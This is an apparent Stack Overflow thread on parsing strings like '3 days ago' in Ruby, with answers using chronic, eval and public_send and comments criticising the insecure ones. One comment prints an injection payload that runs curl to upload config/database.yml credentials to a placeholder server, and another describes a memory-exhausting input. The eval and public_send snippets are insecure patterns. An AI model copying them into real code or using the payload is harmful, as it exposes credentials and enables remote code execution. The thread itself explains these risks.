# Ruby: how to parse string '3 days ago'?

Tags: ruby-on-rails, ruby

Given an input string like `3 days ago`, how can I turn it into a date attribute?

Maybe something like `DateTime.parse('3 days ago')`?

Comment: see this: https://github.com/mojombo/chronic

Answer (score 2):

With rails there is no way to do that. You'll need to create a custom parser or use an already created solution as [chronic](https://github.com/mojombo/chronic) or [chronic_duration](https://github.com/henrypoydar/chronic_duration)

Using `chronic` it would be as simple as your suggestion

```
Chronic.parse('3 days ago')
=> 2020-01-10 19:28:18 UTC
```

Comment: Of all the answers to this question, yours is the only one that is correct. Other answers either open security vulnerabilities (using `eval`), or don't really parse anything.

Comment: Exactly, Michael. I would't choose to use eval because of that reason.

Answer (score -1):

If you are using Ruby on Rails you have the syntax '...ago' for date and time, e.g.:

```
3.hours.ago, 1.day.ago, etc.
```

So you can replace the spaces for dots and eval the string, e.g.:

```
> eval('2 days ago'.tr!(' ', '.'))
Sun, 12 Jan 2020 13:37:00 UTC +00:00
```

Comment: Are there any possible security vulnerabilities when I use this code?

Comment: Yes, `eval` can a be security vulnerability, but you can make sure that what you are passing to `eval` is what you are expecting. In this case make sure that the string is of type `XX yyyy ago`.

Comment: No, if I make sure that what I pass to eval is what I expect (like "3 hours ago"), I need to use a regular expression. But then it's already parsed and you don't use eval anymore. You really almost never should use eval for parsing. Your code is dangerous. A beginner programmer may just copy it and produce a huge security vulnerability. A senior programmer will never copy it because the security vulnerability is obvious. Also, a senior programmer will be able to find a solution to such a simple problem without consulting Stack Overflow.

Comment: 2) `tr!` modifies the string in-place, which is usually a bad thing. It doesn't hurt for a string literal, but you wouldn't use a string literal in real code like this anyways. In real code, you would just write `2.days.ago`. Or you would write `eval(timeStr.tr!(' ', '.'))`, where the side-effect of changing `timeStr` ist most likely undesired.

Comment: In my opinion, if a discussion about security vulnerabilities are being had for something as simple as parsing dates from text, then you're doing it wrong.  If I were doing a PR review on this, I wouldn't approve the use of `eval` for this even if the values were enforced by regex.  Best case scenario, it's ugly, but the worst case scenario is that it introduces an entrypoint for RCEs.  For example: `"\`curl -F 'file=@config/database.yml' http://yourserver/upload\` to_s to_s"` would shell out to upload your database credentials to a remote of your choice.

Answer (score -2):

You could get the current date as a UNIX timestamp (milliseconds or seconds since 1970 Jan 1), and then minus 3 days (also as a Unix timestamp) from it.

i.e.

```
today = Time.now.to_i
three_days = 86400*3
three_days_ago_unix = today - three_days
three_days_ago_date = Time.at(three_days_ago)
```

Comment: I didn't downvote your answer, but I would like to explain what is wrong with it: The question was not how to calculate a date that is "3 days ago", the question was to produce a function that evaluates arbitrary strings of a particular format to a concrete date, like "2 days ago", "6 hours ago", "1 month ago", "79 minutes ago". Since your answer doesn't use the input string at all, it's not an answer to the question.

Comment: ah. i see. yes. 4 years later... this is not a great answer

Answer (score -2):

As an option, in case if you will use rails and you don't need all other functionality of [chronic](https://github.com/mojombo/chronic), you can write something like this:

```
def parse_date(string)
  date, *options = string.split(' ')
  options.inject(date.to_i) do |date, option|
    date.public_send(option)
  end
end
```

Comment: This allows the user to call arbitrary method chains to an integer of any size.  For example, `string` could be `"9"` followed by as many zeroes as you want, followed by `times to_a`.  This would make this function build a gigantic enumerator and build an array from it, which could effectively make Ruby consume CPU and memory until it gets OOM killed.